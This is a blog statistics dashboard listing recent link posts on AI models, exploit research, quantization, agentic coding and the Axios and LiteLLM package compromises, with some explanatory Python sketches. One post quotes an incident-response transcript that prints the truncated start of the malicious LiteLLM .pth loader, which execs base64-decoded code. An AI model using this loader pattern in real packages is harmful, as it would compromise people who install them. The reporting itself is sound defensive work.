Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3288

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8331

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1368

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by bar_label

Ten most recent blogmarks (of 8331 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

Columns: link_title, link_url, commentary, created
Vulnerability Research Is Cooked
https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/

Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.

> Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.

Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:

> You can't design a better problem for an LLM agent than exploitation research.
>
> Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the `hrtimer` subsystem, `workqueue`, or `perf_event`? The model knows.
>
> Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.
>
> Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.

The article was partly inspired by [this episode of the Security Cryptography Whatever podcast](https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/), where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.

I just started a new tag here for [ai-security-research](https://simonwillison.net/tags/ai-security-research/) - it's up to 11 posts already.

2026-04-03 23:59:08+00:00
Gemma 4: Byte for byte, the most capable open models
https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/

Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now.

They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains:

> The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total.

I don't entirely understand that, but apparently that's what the "E" in E2B means!

One particularly exciting feature of these models is that they are multi-modal beyond just images:

> **Vision and audio**: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.

I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet.

I tried them out using the GGUFs for [LM Studio](https://lmstudio.ai/models/gemma-4). The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out `"---\n"` in a loop for every prompt I tried.

The succession of [pelican quality](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb) from 2B to 4B to 26B-A4B is notable:

E2B: ![Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican](https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png)

E4B: ![Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it](https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png)

26B-A4B: ![Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle](https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png)

(This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after [fixing that](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105) I got probably the best pelican I've seen yet from a model that runs on my laptop.)

Google are providing API access to the two larger Gemma models via their [AI Studio](https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it). I added support to [llm-gemini](https://github.com/simonw/llm-gemini) and then [ran a pelican](https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e) through the 31B model using that:

    llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle'

Pretty good, though it is missing the front part of the bicycle frame:

![Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent.](https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png)

2026-04-02 18:28:54+00:00
Announcing 1-bit Bonsai
https://prismml.com/news/bonsai-8b

PrismML is a newly out-of-stealth AI lab with [a focus](https://prismml.com/about) on researching "can we massively multiply intelligence in models without increasing their size or complexity?". Their first model release is a model called Bonsai, and it's very small indeed: it comes in 1.7B, 4B and 8B parameter sizes but uses 1-bit parameters. Here are the sizes of the resulting models on Hugging Face:

| Model | Size |
|-------|------|
| [Bonsai-8B-mlx-1bit](https://huggingface.co/prism-ml/Bonsai-8B-mlx-1bit) | 1.3 GB |
| [Bonsai-8B-gguf](https://huggingface.co/prism-ml/Bonsai-8B-gguf) | 1.16 GB |
| [Bonsai-4B-gguf](https://huggingface.co/prism-ml/Bonsai-4B-gguf) | 572 MB |
| [Bonsai-4B-mlx-1bit](https://huggingface.co/prism-ml/Bonsai-4B-mlx-1bit) | 645 MB |
| [Bonsai-1.7B-gguf](https://huggingface.co/prism-ml/Bonsai-1.7B-gguf) | 248 MB |
| [Bonsai-1.7B-mlx-1bit](https://huggingface.co/prism-ml/Bonsai-1.7B-mlx-1bit) | 285 MB |

2026-04-01 20:20:04+00:00
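The "1-bit" claim can be roughly sanity-checked against the GGUF file sizes in the table above. A minimal sketch, assuming the listed sizes are binary units (GiB/MiB) and ignoring that a file also contains embeddings, norms and metadata, so the result is an upper bound on average bits per weight:

```python
# Rough bits-per-parameter check for the Bonsai GGUF files listed above.

def bits_per_param(file_bytes, n_params):
    """Average number of file bits per model parameter."""
    return file_bytes * 8 / n_params

# (file size in bytes, parameter count) taken from the table above
models = {
    "Bonsai-8B-gguf":   (1.16 * 1024**3, 8e9),
    "Bonsai-4B-gguf":   (572 * 1024**2, 4e9),
    "Bonsai-1.7B-gguf": (248 * 1024**2, 1.7e9),
}

for name, (size, params) in models.items():
    print(f"{name}: {bits_per_param(size, params):.2f} bits/param")
```

All three work out to roughly 1.2 bits per parameter, which is consistent with ~1-bit weights plus some unquantized overhead.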
Supply Chain Attack on Axios Pulls Malicious Dependency from npm
https://socket.dev/blog/axios-npm-package-compromised

Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with [101 million weekly downloads](https://www.npmjs.com/package/axios). Versions `1.14.1` and `0.30.4` both included a new dependency called `plain-crypto-js` which was freshly published malware, stealing credentials and installing a remote access trojan (RAT).

It looks like the attack came from a leaked long-lived npm token. Axios have [an open issue to adopt trusted publishing](https://github.com/axios/axios/issues/7055), which would ensure that only their GitHub Actions workflows are able to publish to npm.

The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM [last week](https://simonwillison.net/2026/Mar/24/malicious-litellm/) as well.

2026-03-31 23:28:40+00:00
Pretext
https://github.com/chenglou/pretext

Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the [react-motion](https://github.com/chenglou/react-motion) animation library.

Pretext solves the problem of calculating the height of a paragraph of line-wrapped text *without touching the DOM*. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications.

Here's [one demo](https://chenglou.me/pretext/dynamic-layout/) that shows the kind of things this makes possible:

<video autoplay loop muted playsinline poster="https://static.simonwillison.net/static/2026/pretex.jpg">
  <source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4">
</video>

The key to how this works is the way it separates calculations into a call to a `prepare()` function followed by multiple calls to `layout()`.

The `prepare()` function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once.

The `layout()` function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height.

I [had Claude](https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe) build me [this interactive artifact](https://tools.simonwillison.net/pretext-explainer) to help me visually understand what's going on, based on a simplified version of Pretext itself.

The way this is tested is particularly impressive. The earlier tests [rendered a full copy of the Great Gatsby](https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2) in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by [the corpora/ folder](https://github.com/chenglou/pretext/tree/main/corpora) using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more.

Cheng Lou [says](https://twitter.com/_chenglou/status/2037715226838343871):

> The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis
>
> This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure & iterate against those at every significant container width, running over weeks

2026-03-29 20:08:45+00:00
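The prepare/layout split is easy to illustrate with a toy sketch. This is not Pretext's actual code: the fixed per-character width is a made-up stand-in for the real off-screen canvas measurements, but the shape is the same - measure segments once, then greedily word-wrap at any width:

```python
# Toy illustration of a prepare()/layout() split for measuring wrapped text.
# Hypothetical widths: real measurements would come from a canvas.

def prepare(text, char_width=8):
    """One-time (expensive) step: split into words and cache their widths."""
    return [(word, len(word) * char_width) for word in text.split()]

def layout(segments, container_width, space_width=4, line_height=20):
    """Cheap step: greedy word-wrap to count lines, return total height."""
    lines, line_width = 1, 0
    for word, width in segments:
        if line_width == 0:
            line_width = width                      # first word on the line
        elif line_width + space_width + width > container_width:
            lines += 1                              # wrap to a new line
            line_width = width
        else:
            line_width += space_width + width
    return lines * line_height

segments = prepare("the quick brown fox jumps over the lazy dog")
print(layout(segments, 120))   # narrow container: more lines, taller
print(layout(segments, 300))   # wide container: fewer lines, shorter
```

Calling `layout()` repeatedly at different widths is cheap because `prepare()` already did all the measuring.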
We Rewrote JSONata with AI in a Day, Saved $500K/Year
https://www.reco.ai/blog/we-rewrote-jsonata-with-ai

Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform.

As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.

2026-03-27 00:35:01+00:00
My minute-by-minute response to the LiteLLM malware attack
https://futuresearch.ai/blog/litellm-attack-transcript/

Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it.

Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:

> **Confirmed**. Fresh download from PyPI right now in an isolated Docker container:
>
>     Inspecting: litellm-1.82.8-py3-none-any.whl
>     FOUND: litellm_init.pth
>     SIZE: 34628 bytes
>     FIRST 200 CHARS:
>     import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
>
> The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.

I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation.

2026-03-26 23:58:22+00:00
Quantization from the ground up
https://ngrok.com/blog/quantization

Sam Rose continues [his streak](https://simonwillison.net/tags/sam-rose/) of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "[the best post I've ever made](https://twitter.com/samwhoo/status/2036845101561835968)").

Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.

![Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111011000111010000, and a slider control at the bottom along with minus, plus, and reset buttons.](https://static.simonwillison.net/static/2026/float.jpg)

I hadn't heard about **outlier values** in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:

> Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are *very* important to model quality. Removing even a *single* "super weight," as Apple calls them, can cause the model to output complete gibberish.
>
> Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.

Plus there's a section on [How much does quantization affect model accuracy?](https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy). Sam explains the concepts of **perplexity** and **KL divergence** and then uses the [llama.cpp perplexity tool](https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity) and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B. His conclusion:

> It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.

2026-03-26 16:21:09+00:00
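The outlier problem can be demonstrated with a toy blockwise absmax quantization scheme - a stand-in for illustration, not necessarily the exact scheme Sam describes. Each block is scaled by its largest absolute value, so a single outlier stretches the scale and crushes the resolution available to its small neighbours:

```python
# Toy blockwise absmax quantization: scale each block so its largest
# absolute value maps to the top of the int8 range, round, then restore.

def quantize_block(block, bits=8):
    qmax = 2 ** (bits - 1) - 1                    # 127 for int8
    scale = max(abs(x) for x in block) / qmax
    return [round(x / scale) for x in block], scale

def dequantize_block(quants, scale):
    return [q * scale for q in quants]

normal  = [0.01, -0.02, 0.015, 0.03]
outlier = [0.01, -0.02, 0.015, 8.0]               # one "super weight"

for block in (normal, outlier):
    quants, scale = quantize_block(block)
    restored = dequantize_block(quants, scale)
    err = max(abs(a - b) for a, b in zip(block, restored))
    print(f"scale={scale:.6f} max error={err:.6f}")
```

In the outlier block the three small weights all round to zero, so the reconstruction error jumps by two orders of magnitude - which is why real schemes pull outliers out into a separate table before quantizing the rest.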
Thoughts on slowing the fuck down
https://news.ycombinator.com/item?id=47517539

Mario Zechner created the [Pi agent framework](https://github.com/badlogic/pi-mono) used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:

> We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.

Agents and humans both make mistakes, but agent mistakes accumulate much faster:

> A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]
>
> With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...]
>
> You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity.

I think Mario is exactly right about this. Agents let us move *so much faster*, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours. It's so easy to let the codebase evolve beyond our ability to reason clearly about it. [Cognitive debt](https://simonwillison.net/tags/cognitive-debt/) is real.

Mario recommends slowing down:

> Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.
>
> Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...]

I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed vs mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software.

2026-03-25 21:47:17+00:00
LiteLLM Hack: Were You One of the 47,000?
https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/

Daniel Hnyk used the [BigQuery PyPI dataset](https://console.cloud.google.com/bigquery?p=bigquery-public-data&d=pypi) to determine how many downloads there were of [the exploited LiteLLM packages](https://simonwillison.net/2026/Mar/24/malicious-litellm/) during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).

They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited releases.

2026-03-25 17:21:04+00:00
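The pinning point is easy to illustrate with a stdlib-only sketch (real tooling should use the `packaging` library's specifier handling): check which common `litellm` requirement styles would have admitted the compromised 1.82.7 / 1.82.8 releases.

```python
# Illustrative check: does a requirement like `litellm>=1.0.0` allow pip
# to resolve to one of the two compromised LiteLLM releases?

def v(s):
    """Parse a simple dotted version string into a comparable tuple."""
    return tuple(int(part) for part in s.split("."))

COMPROMISED = [v("1.82.7"), v("1.82.8")]

def exposed(op, pinned):
    """True if a `litellm{op}{pinned}` requirement admits a bad version."""
    p = v(pinned)
    checks = {
        "==": lambda bad: bad == p,
        ">=": lambda bad: bad >= p,
        "<":  lambda bad: bad < p,
    }
    return any(checks[op](bad) for bad in COMPROMISED)

print(exposed("==", "1.82.6"))   # exact pin to a safe version: False
print(exposed(">=", "1.0.0"))    # open-ended range: True
print(exposed("<",  "1.82.7"))   # upper bound below the bad releases: False
```

An exact pin (or a lock file) is the only style here that is immune regardless of what gets published upstream.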